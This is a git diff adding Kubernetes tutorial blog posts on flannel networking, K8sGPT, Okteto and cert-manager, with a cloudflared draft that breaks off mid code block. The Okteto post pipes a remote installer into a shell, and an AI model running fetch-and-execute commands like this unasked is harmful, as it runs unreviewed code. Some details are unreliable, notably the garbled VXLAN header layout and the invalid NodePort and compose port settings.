certificate. 
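+Before curling through the ingress, it is worth confirming that cert-manager's ingress-shim issued a certificate for it. A quick check (a sketch, with names taken from the manifests above):
+
+```
+# the Ingress certificate and its secret are created under the name given in spec.tls.secretName
+kubectl -n test get certificate,secret
+# echo.info must also resolve locally, e.g. via an /etc/hosts entry pointing at the
+# minikube tunnel address (an assumption about the local setup)
+```
+
+The request itself: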
+``` +➜ minikube-certmanager git:(main) βœ— curl --cacert <(kubectl -n test get secret echo-server-cert -o jsonpath='{.data.ca\.crt}' | base64 -d) https://echo.info/test +"source":"172.17.0.7:42246","method":"GET","headers":[["host","echo.info"],["x-request-id","6e0035387cfa6be8c53a3e03e73e9f23"],["x-real-ip","172.17.0.1"],["x-forwarded-for","172.17.0.1"],["x-forwarded-host","echo.info"],["x-forwarded-port","443"],["x-forwarded-proto","https"],["x-forwarded-scheme","https"],["x-scheme","https"],["user-agent","curl/7.79.1"],["accept","*/*"]],"path":"/test","server":"echo-6885c7cfdc-8phts"} +``` + +## source code + +{{< rawhtml >}} +
+
+{{< /rawhtml >}} + +Join [CloudNativeFolks Community](https://discord.gg/rEvr7vq) or Reach out to me on twitter [@sangamtwts](https://twitter.com/sangamtwts) diff --git a/content/en/blog/cloudflared/index 2.md b/content/en/blog/cloudflared/index 2.md new file mode 100644 index 0000000..11b6567 --- /dev/null +++ b/content/en/blog/cloudflared/index 2.md @@ -0,0 +1,28 @@ +--- +title : cloudflared tunnel on kubernetes +author : Sangam Biradar +categories : + - Kubernetes +weight : 10 +description : How to install cloudflared tunnel on kubernetes +draft : true +Date : 2023-02-17 +author : Sangam Biradar +--- + +## What is cloudflared tunnel? + +Cloudflare Tunnel is a reverse proxy that enables you to expose applications running on your local web server, on any network with an Internet connection, without adding DNS records or configuring a firewall or router. Cloudflare Tunnel establishes outbound connections to Cloudflare’s nearest data center and creates secure tunnels between the data center and a locally running web server. + +## How to install cloudflared tunnel on kubernetes? + +### Create a namespace + +```bash +kubectl create ns cloudflared +``` + +### Create a secret + +```bash + diff --git a/content/en/blog/flannel/VXLAN_Packet 2.png b/content/en/blog/flannel/VXLAN_Packet 2.png new file mode 100644 index 0000000..d816c10 Binary files /dev/null and b/content/en/blog/flannel/VXLAN_Packet 2.png differ diff --git a/content/en/blog/flannel/busybox1 2.yaml b/content/en/blog/flannel/busybox1 2.yaml new file mode 100644 index 0000000..42b8b71 --- /dev/null +++ b/content/en/blog/flannel/busybox1 2.yaml @@ -0,0 +1,11 @@ +apiVersion: v1 +kind: Pod +metadata: + name: busybox1 + labels: + tier: linux +spec: + containers: + - name: busybox1 + image: busybox + command: ['sh', '-c', ' sleep 3600'] diff --git a/content/en/blog/flannel/busybox2 2.yaml b/content/en/blog/flannel/busybox2 2.yaml new file mode 100644 index 0000000..ed83965 --- /dev/null +++ b/content/en/blog/flannel/busybox2 2.yaml @@ -0,0 +1,11 @@ +apiVersion: v1 +kind: Pod +metadata: + name: busybox2 + labels: + tier: linux +spec: + containers: + - name: busybox2 + image: busybox + command: ['sh', '-c', ' sleep 3600'] diff --git a/content/en/blog/flannel/busybox3 2.yaml b/content/en/blog/flannel/busybox3 2.yaml new file mode 100644 index 0000000..0cae656 --- /dev/null +++ b/content/en/blog/flannel/busybox3 2.yaml @@ -0,0 +1,12 @@ +apiVersion: v1 +kind: Pod +metadata: + name: busybox3 + labels: + tier: linux +spec: + nodeName: minikube + containers: + - name: busybox3 + image: busybox + command: ['sh', '-c', ' sleep 3600'] diff --git a/content/en/blog/flannel/flannel 2.png b/content/en/blog/flannel/flannel 2.png new file mode 100644 index 0000000..481fb61 Binary files /dev/null and b/content/en/blog/flannel/flannel 2.png differ diff --git a/content/en/blog/flannel/index 2.md b/content/en/blog/flannel/index 2.md new file mode 100644 index 0000000..d78442c --- /dev/null +++ b/content/en/blog/flannel/index 2.md @@ -0,0 +1,264 @@ +--- +title : Flannel is a network fabric for containers, designed for Kubernetes. +author : Sangam Biradar +categories : + - Kubernetes +weight : 10 +description : Flannel is a simple and easy way to configure a layer 3 network fabric designed for Kubernetes +draft : false +Date : 2023-02-17 +author : Sangam Biradar +--- + +{{< rawhtml >}} +
+
+{{< /rawhtml >}} + +### kubenetes networking + +![](./k8s-CNI-1.png) + + +### Networking details + +- Platforms like Kubernetes assume that each container (pod) has a unique, routable IP inside the cluster. The advantage of this model is that it removes the port mapping complexities that come from sharing a single host IP. + +- Flannel is responsible for providing a layer 3 IPv4 network between multiple nodes in a cluster. Flannel does not control how containers are networked to the host, only how the traffic is transported between hosts. However, flannel does provide a CNI plugin for Kubernetes and a guidance on integrating with Docker. Flannel is focused on networking + +- Flannel is a network overlay for Kubernetes. It provides a way for pods to communicate with each other even if they are not on the same host. Flannel is a simple and lightweight network overlay that is easy to install and configure. + +- Flannel works by creating a virtual network on top of the physical network. This virtual network is made up of tunnels that connect the pods. The tunnels are created using the VXLAN protocol. + +- When a pod sends a packet to another pod, the packet is encapsulated in a VXLAN header and sent to the tunnel that connects the two pods. The tunnel then decapsulates the packet and sends it to the destination pod. + +- Flannel is a layer 3 network, which means that it supports routing between pods. This is in contrast to some other network overlays, such as Docker Swarm, which are layer 2 networks. + +- Flannel does not control how containers are networked to the host. This is the responsibility of the host's operating system. Flannel only controls how traffic is transported between hosts. + +- Flannel provides a CNI plugin for Kubernetes. This plugin makes it easy to install and configure Flannel with Kubernetes. Flannel also provides guidance on integrating with Docker. + +#### Here are some of the benefits of using Flannel: + +- It is a simple and lightweight network overlay. +- It is easy to install and configure. +- It does not require any additional infrastructure. +- It is a good choice for small and medium-sized Kubernetes clusters. +- It supports routing between pods. +- It is compatible with Kubernetes and Docker. + +### Flannel Overlay Network + +To achieve kubernetes' network requirements, flannel’s idea is simple: create another flat network which runs above the host network, this is the so-called overlay network. All containers(Pod) will be assigned one ip address in this overlay network, they communicate with each other by calling each other’s ip address directly. + +![](./k8s-CNI-2.png) + + +### minikube start + +``` + ~ minikube start +πŸ˜„ minikube v1.30.1 on Darwin 13.3.1 (arm64) +✨ Using the docker driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... +πŸ”„ Restarting existing docker container for "minikube" ... +❗ Image was not built for the current minikube version. To resolve this you can delete and recreate your minikube cluster using the latest images. Expected minikube version: v1.29.0 -> Actual minikube version: v1.30.1 +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... +πŸ”— Configuring bridge CNI (Container Networking Interface) ... +πŸ”Ž Verifying Kubernetes components... 
+ β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 +πŸ’‘ After the addon is enabled, please run "minikube tunnel" and your ingress resources would be available at "127.0.0.1" + β–ͺ Using image registry.k8s.io/ingress-nginx/controller:v1.7.0 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 +πŸ”Ž Verifying ingress addon... +🌟 Enabled addons: storage-provisioner, default-storageclass, ingress +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default +``` + +### Install Flannel on Minikube + +``` + ~ kubectl apply -f https://github.com/flannel-io/flannel/releases/latest/download/kube-flannel.yml +namespace/kube-flannel created +serviceaccount/flannel created +clusterrole.rbac.authorization.k8s.io/flannel created +clusterrolebinding.rbac.authorization.k8s.io/flannel created +configmap/kube-flannel-cfg created +daemonset.apps/kube-flannel-ds created +``` + +### Minikube provide option to select CNI Plugins +``` +--cni='': + CNI plug-in to use. Valid options: auto, bridge, calico, cilium, flannel, kindnet, or path + to a CNI manifest (default: auto) +``` +- while starting minikube define cni flag +``` + minikube start --cni=flannel +πŸ˜„ minikube v1.30.1 on Darwin 13.3.1 (arm64) +✨ Automatically selected the docker driver. Other choices: qemu2, virtualbox, ssh +πŸ“Œ Using Docker Desktop driver with root privileges +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... + > gcr.io/k8s-minikube/kicbase...: 336.39 MiB / 336.39 MiB 100.00% 4.83 Mi +πŸ”₯ Creating docker container (CPUs=4, Memory=8192MB) ... +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... + β–ͺ Generating certificates and keys ... + β–ͺ Booting up control plane ... + β–ͺ Configuring RBAC rules ... +πŸ”— Configuring Flannel (Container Networking Interface) ... + β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 +πŸ”Ž Verifying Kubernetes components... +🌟 Enabled addons: storage-provisioner, default-storageclass +πŸ„ Done! kubectl is now configured to use "minikube" cluster and "default" namespace by default +``` +### add another working node + +``` +➜ sangam14.github.io git:(main) βœ— minikube node add +πŸ˜„ Adding node m02 to cluster minikube +❗ Cluster was created without any CNI, adding a node to it might cause broken networking. +πŸ‘ Starting worker node minikube-m02 in cluster minikube +🚜 Pulling base image ... +πŸ”₯ Creating docker container (CPUs=4, Memory=8192MB) ... +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... +πŸ”Ž Verifying Kubernetes components... +πŸ„ Successfully added m02 to minikube! 
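+# (added note) each node should now hold its own /24 slice of the 10.244.0.0/16 pod
+# network that flannel serves; this can be confirmed with:
+#   kubectl get nodes -o jsonpath='{range .items[*]}{.metadata.name}{"\t"}{.spec.podCIDR}{"\n"}{end}'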
+``` +### Minikube Node list + +``` + ~ minikube node list +minikube 192.168.49.2 +minikube-m02 192.168.49.3 + +``` + +### Minikube create namespace kube-flannel + +``` +kubectl get pods -n kube-flannel +NAME READY STATUS RESTARTS AGE +kube-flannel-ds-48tbz 1/1 Running 0 21m +kube-flannel-ds-ltg88 1/1 Running 0 8m52s +``` + +#### create 2 busybox pod + +``` +kubectl create -f busybox1.yaml +kubectl create -f busybox2.yaml +``` +### get pods +``` +flannel git:(main) βœ— kubectl get pods +NAME READY STATUS RESTARTS AGE +busybox1 1/1 Running 0 31s +busybox2 1/1 Running 0 45s +``` +### get more details around this pods +``` +kubectl get pods -o wide +``` +### The subnet of eth0 should match the CNI subnet +``` +flannel git:(main) βœ— kubectl exec --stdin --tty busybox1 -- ifconfig +eth0 Link encap:Ethernet HWaddr 52:3B:44:60:37:EB + inet addr:10.244.1.3 Bcast:10.244.1.255 Mask:255.255.255.0 + UP BROADCAST RUNNING MULTICAST MTU:65485 Metric:1 + RX packets:0 errors:0 dropped:0 overruns:0 frame:0 + TX packets:1 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:0 (0.0 B) TX bytes:42 (42.0 B) + +lo Link encap:Local Loopback + inet addr:127.0.0.1 Mask:255.0.0.0 + UP LOOPBACK RUNNING MTU:65536 Metric:1 + RX packets:0 errors:0 dropped:0 overruns:0 frame:0 + TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) + +➜ flannel git:(main) βœ— kubectl exec --stdin --tty busybox2 -- ifconfig +eth0 Link encap:Ethernet HWaddr 5E:FA:9B:2F:A1:69 + inet addr:10.244.1.2 Bcast:10.244.1.255 Mask:255.255.255.0 + UP BROADCAST RUNNING MULTICAST MTU:65485 Metric:1 + RX packets:0 errors:0 dropped:0 overruns:0 frame:0 + TX packets:1 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:0 + RX bytes:0 (0.0 B) TX bytes:42 (42.0 B) + +lo Link encap:Local Loopback + inet addr:127.0.0.1 Mask:255.0.0.0 + UP LOOPBACK RUNNING MTU:65536 Metric:1 + RX packets:0 errors:0 dropped:0 overruns:0 frame:0 + TX packets:0 errors:0 dropped:0 overruns:0 carrier:0 + collisions:0 txqueuelen:1000 + RX bytes:0 (0.0 B) TX bytes:0 (0.0 B) + +``` + +#### We should be able to ping between PoDs. + +``` + flannel git:(main) βœ— kubectl exec --stdin --tty busybox1 -- ping 10.244.1.2 +PING 10.244.1.2 (10.244.1.2): 56 data bytes +64 bytes from 10.244.1.2: seq=0 ttl=64 time=0.326 ms +64 bytes from 10.244.1.2: seq=1 ttl=64 time=0.086 ms +64 bytes from 10.244.1.2: seq=2 ttl=64 time=0.097 ms +64 bytes from 10.244.1.2: seq=3 ttl=64 time=0.106 ms +64 bytes from 10.244.1.2: seq=4 ttl=64 time=0.103 ms +64 bytes from 10.244.1.2: seq=5 ttl=64 time=0.071 ms +^C + +``` + +### PoDs in the host network of a node can communicate with all pods on all nodes without NAT + + +``` +➜ flannel git:(main) βœ— kubectl create -f busybox3.yaml +pod/busybox3 created +➜ flannel git:(main) βœ— kubectl get pods -o wide +NAME READY STATUS RESTARTS AGE IP NODE NOMINATED NODE READINESS GATES +busybox1 1/1 Running 5 (11m ago) 23h 10.244.1.3 minikube-m02 +busybox2 1/1 Running 5 (12m ago) 23h 10.244.1.2 minikube-m02 +busybox3 1/1 Running 0 20s 10.244.0.3 minikube +``` +Now starting a ping from this new PoD busybox 3 (in minikube node ) to busybox1 (in minikube-m02 ). 
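+Before the ping itself, the VXLAN plumbing can be inspected on the node. A minimal sketch, assuming flannel's default VXLAN device name, flannel.1:
+
+```
+# the VXLAN device flannel created on this node (shows the VNI, local VTEP address and UDP port)
+minikube ssh -- ip -d link show flannel.1
+# the other node's 10.244.x.0/24 subnet is routed via flannel.1
+minikube ssh -- ip route
+```
+
+The cross-node ping: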
+ +``` + flannel git:(main) βœ— kubectl exec --stdin --tty busybox3 -- ping 10.244.1.3 +PING 10.244.1.3 (10.244.1.3): 56 data bytes +64 bytes from 10.244.1.3: seq=0 ttl=62 time=0.703 ms +64 bytes from 10.244.1.3: seq=1 ttl=62 time=0.198 ms +64 bytes from 10.244.1.3: seq=2 ttl=62 time=0.169 ms +64 bytes from 10.244.1.3: seq=3 ttl=62 time=0.159 ms +64 bytes from 10.244.1.3: seq=4 ttl=62 time=0.160 ms +64 bytes from 10.244.1.3: seq=5 ttl=62 time=0.125 ms +64 bytes from 10.244.1.3: seq=6 ttl=62 time=0.156 ms +64 bytes from 10.244.1.3: seq=7 ttl=62 time=0.179 ms +^C +``` +This works as expected. This is possible due to VxLAN implementation in flannel. +The VxLAN header is 8 bytes long and has the following format: + +24-bit VNID (Virtual Network Identifier): This field identifies the VxLAN network that the packet belongs to. +8-bit Flags: This field contains a few flags that control how the packet is processed. +24-bit Reserved: This field is reserved for future use. +20-byte Outer IP Header: This field contains the IP header of the encapsulated packet. +The VxLAN header is encapsulated in a UDP packet, which is then sent over the L3 routed infrastructure. The destination UDP port for VxLAN packets is 4789. + +When a VxLAN packet arrives at a VTEP, the VTEP decapsulates the packet and forwards the encapsulated packet to the destination host. + +VxLAN is a popular network virtualization technology that is used to create overlay networks over L3 routed infrastructures. VxLAN is a good choice for network virtualization because it is scalable, efficient, and easy to manage. + +![](./VXLAN_Packet.png) + + +Join [CloudNativeFolks Community](https://discord.gg/rEvr7vq) or Reach out to me on twitter [@sangamtwts](https://twitter.com/sangamtwts) + + diff --git a/content/en/blog/flannel/k8s-CNI-1 2.png b/content/en/blog/flannel/k8s-CNI-1 2.png new file mode 100644 index 0000000..4657a3c Binary files /dev/null and b/content/en/blog/flannel/k8s-CNI-1 2.png differ diff --git a/content/en/blog/flannel/k8s-CNI-2 2.png b/content/en/blog/flannel/k8s-CNI-2 2.png new file mode 100644 index 0000000..3454137 Binary files /dev/null and b/content/en/blog/flannel/k8s-CNI-2 2.png differ diff --git a/content/en/blog/k8sgpt/index 2.md b/content/en/blog/k8sgpt/index 2.md new file mode 100644 index 0000000..7de0ad5 --- /dev/null +++ b/content/en/blog/k8sgpt/index 2.md @@ -0,0 +1,214 @@ +--- +title : K8sgpt - Chatgpt base SRE +author : Sangam Biradar +categories : + - Kubernetes +weight : 30 +description : k8sgpt chat gpt for trubleshooting +draft : true +Date : 2023-02-15 +author : Sangam Biradar +--- + + +### Install k8sgpt ai + +``` + ~ brew tap k8sgpt-ai/k8sgpt +==> Tapping k8sgpt-ai/k8sgpt +Cloning into '/opt/homebrew/Library/Taps/k8sgpt-ai/homebrew-k8sgpt'... +remote: Enumerating objects: 86, done. +remote: Counting objects: 100% (86/86), done. +remote: Compressing objects: 100% (85/85), done. +remote: Total 86 (delta 51), reused 2 (delta 0), pack-reused 0 +Receiving objects: 100% (86/86), 18.77 KiB | 6.26 MiB/s, done. +Resolving deltas: 100% (51/51), done. +Tapped 1 formula (14 files, 37.8KB). 
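+# with the tap in place, install the CLI itself; the same binary is also published
+# on the project's GitHub releases page (as the download URL below shows)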
+➜ ~ brew install k8sgpt +==> Fetching k8sgpt-ai/k8sgpt/k8sgpt +==> Downloading https://github.com/k8sgpt-ai/k8sgpt/releases/download/v0.3.0/k8sgpt_Darwin_arm64.tar.gz +==> Downloading from https://objects.githubusercontent.com/github-production-release-asset-2e65be/617152691/d9f59995-7f6 +################################################################################################################# 100.0% +==> Installing k8sgpt from k8sgpt-ai/k8sgpt +🍺 /opt/homebrew/Cellar/k8sgpt/0.3.0: 6 files, 55.5MB, built in 1 second +==> Running `brew cleanup k8sgpt`... + +``` + +### K8s filters list + +``` +k8sgpt filters list +Active: +> Pod +> PersistentVolumeClaim +> StatefulSet +> CronJob +> Deployment +> ReplicaSet +> Service +> Ingress +> Node +Unused: +> NetworkPolicy +> HorizontalPodAutoScaler +> PodDisruptionBudget + +``` + +### How K8sGPT works ? + +K8sGPT uses analyzers to triage and diagnose issues in your cluster. It has a set of analyzers that are built in, but you will be able to write your own analyzers. + +Built in analyzers + +Enabled by default + +- podAnalyzer + https://github.com/k8sgpt-ai/k8sgpt/blob/main/pkg/analyzer/pod.go + - search all namespaces for pods that are not running + - Check through container status to check for crashes or unready + - a container that is still being created or blocked due to conditions such as OOMKilled + - when pod is Running but its ReadinessProbe fails + +- pvcAnalyzer + - PersistentVolumeClaim.ObjectMeta + - Error: value.FailureDetails +- rsAnalyzer + - Status of replicaset + - type of event + - reason of failure + + ``` + Events: + Type Reason Age From Message + ---- ------ ---- ---- ------- + Normal SuccessfulCreate 117s replicaset-controller Created pod: frontend-wtsmm + Normal SuccessfulCreate 116s replicaset-controller Created pod: frontend-b2zdv + Normal SuccessfulCreate 116s replicaset-controller Created pod: frontend-vcmts + ``` +- serviceAnalyzer + - Service existed or not + - Service has not ready endpoints +- eventAnalyzer + - the function loops through the list of events to find the most recent one. It initializes a pointer to the latest event as nil, and then compares each event's LastTimestamp field to the current latest event's LastTimestamp. If the current event has a later LastTimestamp, the function updates the latestEvent pointer to point to that event instead. + + - Finally, the function returns a pointer to the latest event found, or an error if there was a problem fetching the events from the Kubernetes API. + + - Overall, this function is useful for retrieving the most recent event associated with a Kubernetes object, which can be helpful in monitoring and troubleshooting the state of Kubernetes resources. + +- ingressAnalyzer + - checks if the Ingress is using TLS encryption and extracts the list of hostnames associated with the Ingress. + - implementation is specifically responsible for extracting and organizing relevant information from Kubernetes Ingress resources to generate descriptions about them. +- statefulSetAnalyzer + - check StatefulSet uses the service namespace and servicename which does not exist + - The volumeClaimTemplates will provide stable storage using PersistentVolumes provisioned by a PersistentVolume Provisioner. 
+ +- deploymentAnalyzer + - DeploymentAnalyzer is an analyzer that checks for misconfigured Deployments from all namespaces +- cronJobAnalyzer + - Check CRON schedule format +- networkPolicyAnalyzer + - Check if policy allows traffic to all pods in the namespace + - Check if policy is not applied to any pods +- nodeAnalyzer + +> Conditions + +The conditions field describes the status of all Running nodes. Examples of conditions include: + +| Node Condition | Description | +| ---------------|-------------- | +| Ready | True if the node is healthy and ready to accept pods, False if the node is not healthy and is not accepting pods, and Unknown if the node controller has not heard from the node in the last node-monitor-grace-period (default is 40 seconds) | +| DiskPressure | True if pressure exists on the disk sizeβ€”that is, if the disk capacity is low; otherwise False | +| MemoryPressure | True if pressure exists on the node memoryβ€”that is, if the node memory is low; otherwise False | +| PIDPressure | True if pressure exists on the processesβ€”that is, if there are too many processes on the node; otherwise False | +NetworkUnavailable | True if the network for the node is not correctly configured, otherwise False | + + + + - In the Kubernetes API, a node's condition is represented as part of the .status of the Node resource. For example, the following JSON structure describes a healthy node: + +``` + "conditions": [ + { + "type": "Ready", + "status": "True", + "reason": "KubeletReady", + "message": "kubelet is posting ready status", + "lastHeartbeatTime": "2023-06-05T18:38:35Z", + "lastTransitionTime": "2023-06-05T11:41:27Z" + } +] + +``` + + +### start minikube + +``` +➜ ~ minikube start +πŸ˜„ minikube v1.30.0 on Darwin 13.3.1 (arm64) +πŸŽ‰ minikube 1.30.1 is available! Download it: https://github.com/kubernetes/minikube/releases/tag/v1.30.1 +πŸ’‘ To disable this notice, run: 'minikube config set WantUpdateNotification false' + +✨ Using the docker driver based on existing profile +πŸ‘ Starting control plane node minikube in cluster minikube +🚜 Pulling base image ... +πŸ”„ Restarting existing docker container for "minikube" ... +❗ Image was not built for the current minikube version. To resolve this you can delete and recreate your minikube cluster using the latest images. Expected minikube version: v1.29.0 -> Actual minikube version: v1.30.0 +🐳 Preparing Kubernetes v1.26.3 on Docker 23.0.2 ... +πŸ”— Configuring bridge CNI (Container Networking Interface) ... +πŸ”Ž Verifying Kubernetes components... +πŸ’‘ After the addon is enabled, please run "minikube tunnel" and your ingress resources would be available at "127.0.0.1" + β–ͺ Using image gcr.io/k8s-minikube/storage-provisioner:v5 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 + β–ͺ Using image registry.k8s.io/ingress-nginx/kube-webhook-certgen:v20230312-helm-chart-4.5.2-28-g66a760794 + β–ͺ Using image registry.k8s.io/ingress-nginx/controller:v1.7.0 +πŸ”Ž Verifying ingress addon... +🌟 Enabled addons: storage-provisioner, default-storageclass, ingress +πŸ„ Done! 
kubectl is now configured to use "minikube" cluster and "default" namespace by default
+➜  ~
+
+```
+
+### Deploy a sample pod with a broken image
+
+The image tag `nginx:5.0.0` does not exist, so the pod will get stuck pulling its image and gives K8sGPT something to diagnose:
+
+```
+➜ kubectl run nginx --image=nginx:5.0.0 --restart=Never
+
+pod/nginx created
+
+
+```
+
+Now run `k8sgpt analyze` to triage the cluster:
+
+```
+~ k8sgpt analyze
+Service kube-system/k8s.io-minikube-hostpath does not exist
+
+0 default/nginx(nginx)
+- Error: Back-off pulling image "nginx:5.0.0"
+
+```
+
+
+K8sGPT is a tool for scanning your Kubernetes clusters and diagnosing and triaging issues in simple English. It has SRE experience codified into its analyzers and pulls out the most relevant information to enrich with AI.
+
+> Here are some of the features of K8sGPT:
+
+- Scans your Kubernetes clusters for common problems and issues.
+- Diagnoses and triages issues in simple English.
+- Pulls out the most relevant information and enriches it with AI.
+- Is constantly updated to keep up with the latest Kubernetes releases.
+
+K8sGPT is a valuable tool for any Kubernetes administrator or developer. It can help you identify and resolve issues quickly and easily, and it can help you improve the performance and reliability of your Kubernetes clusters.
+
+> Here are some of the benefits of using K8sGPT:
+
+- Increased uptime and reliability: K8sGPT helps you identify and resolve issues quickly and easily, which increases the uptime and reliability of your Kubernetes clusters.
+- Improved performance: K8sGPT helps you identify and remove performance bottlenecks, which improves the performance of your Kubernetes clusters.
+- Reduced costs: K8sGPT helps you reduce the cost of operating your Kubernetes clusters by identifying and eliminating unnecessary resources.
+
+If you are a Kubernetes administrator or developer, I encourage you to try K8sGPT. It is a valuable tool that can help you improve the performance, reliability, and security of your Kubernetes clusters.
+
+
+
+
 diff --git a/content/en/blog/okteto/2048-k8s 2.png b/content/en/blog/okteto/2048-k8s 2.png new file mode 100644 index 0000000..22a7144 Binary files /dev/null and b/content/en/blog/okteto/2048-k8s 2.png differ diff --git a/content/en/blog/okteto/index 2.md b/content/en/blog/okteto/index 2.md new file mode 100644 index 0000000..298a4da --- /dev/null +++ b/content/en/blog/okteto/index 2.md @@ -0,0 +1,425 @@
+---
+title : Okteto - Develop your applications directly in your Kubernetes Cluster
+author : Sangam Biradar
+categories :
+  - Kubernetes
+weight : 50
+description : Reduce the inner loop and focus on developing your application
+draft : false
+Date : 2023-02-18
+author : Sangam Biradar
+---
+
+
+{{< rawhtml >}}
+
+{{< /rawhtml >}}
+
+### Getting started with the Okteto CLI
+
+- macOS/Linux
+
+```bash
+
+➜ curl https://get.okteto.com -sSfL | sh
+> Using Release Channel: stable
+> Using Version: 2.14.0
+> Downloading https://downloads.okteto.com/cli/stable/2.14.0/okteto-Darwin-arm64
+  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
+                                 Dload  Upload   Total   Spent    Left  Speed
+100 74.8M  100 74.8M    0     0  20.0M      0  0:00:03  0:00:03 --:--:-- 20.0M
+
+```
+
+### Log in to Okteto Cloud with your GitHub account
+
+![](./okteto-login.png)
+
+
+### Configuring the Okteto CLI with Okteto Cloud
+
+```bash
+
+➜ okteto context
+A context defines the default cluster/namespace for any Okteto CLI command.
+Select the context you want to use:
+Use the arrow keys to navigate: ↓ ↑ β†’ ←
+  β–Έ https://cloud.okteto.com (Okteto Cloud) *
+    docker-desktop
+    minikube
+    multinode-pod-security
+
+    Create new context
+```
+Or set the context directly:
+
+```bash
+➜ okteto context use https://cloud.okteto.com
+ βœ“  Using sangam14 @ cloud.okteto.com
+```
+
+The `2048` folder contains the source code for the 2048 game, along with a `Dockerfile` and a `docker-compose.yml`:
+
+```Dockerfile
+FROM nginx
+
+COPY 2048 /usr/share/nginx/html
+
+EXPOSE 80
+
+CMD ["nginx", "-g", "daemon off;"]
+```
+
+```yaml
+# docker-compose.yml
+services:
+  game:
+    build: ./
+    expose:
+      - 8080:80
+```
+
+### Deploy Docker Compose on Okteto Cloud
+
+Okteto uses the [compose-spec](https://github.com/compose-spec/compose-spec) and converts your Docker Compose file into Kubernetes manifests.
+
+You can read more about Docker Compose on Okteto here: https://www.okteto.com/docs/reference/compose/
+
+```bash
+okteto deploy --build
+ i  Using sangam14 @ cloud.okteto.com as context
+ i  Building 'Dockerfile' in tcp://buildkit.cloud.okteto.net:443...
+[+] Building 7.8s (7/7) FINISHED
+ => [internal] load build definition from buildkit-3366967893                                  0.9s
+ => => transferring dockerfile: 137B                                                           0.8s
+ => [internal] load .dockerignore                                                              0.7s
+ => => transferring context: 2B                                                                0.6s
+ => [internal] load metadata for docker.io/library/nginx:latest                                1.1s
+ => [internal] load build context                                                              2.5s
+ => => transferring context: 603.29kB                                                          2.5s
+ => CACHED [1/2] FROM docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19  0.0s
+ => => resolve docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19c0  0.0s
+ => [2/2] COPY 2048 /usr/share/nginx/html                                                      0.3s
+ => exporting to image                                                                         2.5s
+ => => exporting layers                                                                        0.1s
+ => => exporting manifest sha256:79f1385595d70b82b4b5db52f5edddb1f4a06c79ded928926d48bb947a5322b6  0.0s
+ => => exporting config sha256:ecf1dac7fbfaa6cdcb88dd2bbc616edbbc96459b078f15199fe3ddd564c481de  0.0s
+ => => pushing layers                                                                          1.6s
+ => => pushing manifest for registry.cloud.okteto.net/sangam14/okteto-2048-game:okteto@sha256:79f1385595d70b82b4b5d  0.8s
+ βœ“  Image 'registry.cloud.okteto.net/sangam14/okteto-2048-game:okteto' successfully pushed
+ βœ“  Kubernetes service 'game' created
+ βœ“  Endpoint 'game' created
+ βœ“  Service 'game' created
+ βœ“  Compose 'Okteto-2048' successfully deployed
+ βœ“  Development environment 'Okteto-2048' successfully deployed
+ i  Run 'okteto up' to activate your development container
+
+```
+
+### Check it out in Okteto Cloud
+
+The deployed development environment shows up in the Okteto Cloud dashboard:
+
+![](./okteto-UI.png)
+
+
+### Check the endpoints
+
+Open the `game` endpoint and you will see the application running:
+
+![](./okteto-2048-game.png)
+
+### Deploy the same app using Kubernetes manifests
+
+Okteto can also build Docker images remotely, which means you can build images without having Docker installed locally.
+ +```bash + +➜ okteto build -t sangam14/okteto-2048-game:okteto . + i Building 'Dockerfile' in tcp://buildkit.cloud.okteto.net:443... +[+] Building 5.9s (8/8) FINISHED + => [internal] load build definition from buildkit-3724659360 1.5s + => => transferring dockerfile: 180B 1.5s + => [internal] load .dockerignore 0.9s + => => transferring context: 2B 0.8s + => [internal] load metadata for docker.io/library/nginx:latest 0.9s + => CACHED [1/3] FROM docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19 0.0s + => => resolve docker.io/library/nginx@sha256:2ab30d6ac53580a6db8b657abf0f68d75360ff5cc1670a85acb5bd85ba1b19c0 0.0s + => [internal] load build context 0.9s + => => transferring context: 4.66kB 0.5s + => [2/3] RUN chmod +x /usr/sbin/nginx 0.9s + => [3/3] COPY 2048 /usr/share/nginx/html 0.3s + => exporting to image 2.1s + => => exporting layers 0.3s + => => exporting manifest sha256:ad9bdd97413eddbcd25fe2d1c55992796848a314e33165235a307726dcadaf8a 0.0s + => => exporting config sha256:2f2ffc174a087bf9653029ec247279885a59e77887a259e592761ed4b06a3959 0.0s + => => pushing layers 1.5s + => => pushing manifest for docker.io/sangam14/okteto-2048-game:okteto@sha256:ad9bdd97413eddbcd25fe2d1c55992796848a 0.3s + βœ“ Image 'sangam14/okteto-2048-game:okteto' successfully pushed + +``` + +### Okteto Support Kubernetes , Kustomize also Helm charts + +```yaml +apiVersion: apps/v1 +kind: Deployment +metadata: + name: nginx-deployment +spec: + selector: + matchLabels: + app: nginx + replicas: 2 + template: + metadata: + labels: + app: nginx + spec: + containers: + - name: nginx + image: docker.io/sangam14/okteto-2048-game:okteto + ports: + - containerPort: 80 +--- +apiVersion: v1 +kind: Service +metadata: + name: nginx-service + labels: + app: nginx +spec: + type: NodePort + ports: + - port: 8080 + targetPort: 80 + nodePort: 8080 + protocol: TCP + selector: + app: nginx + + +``` + 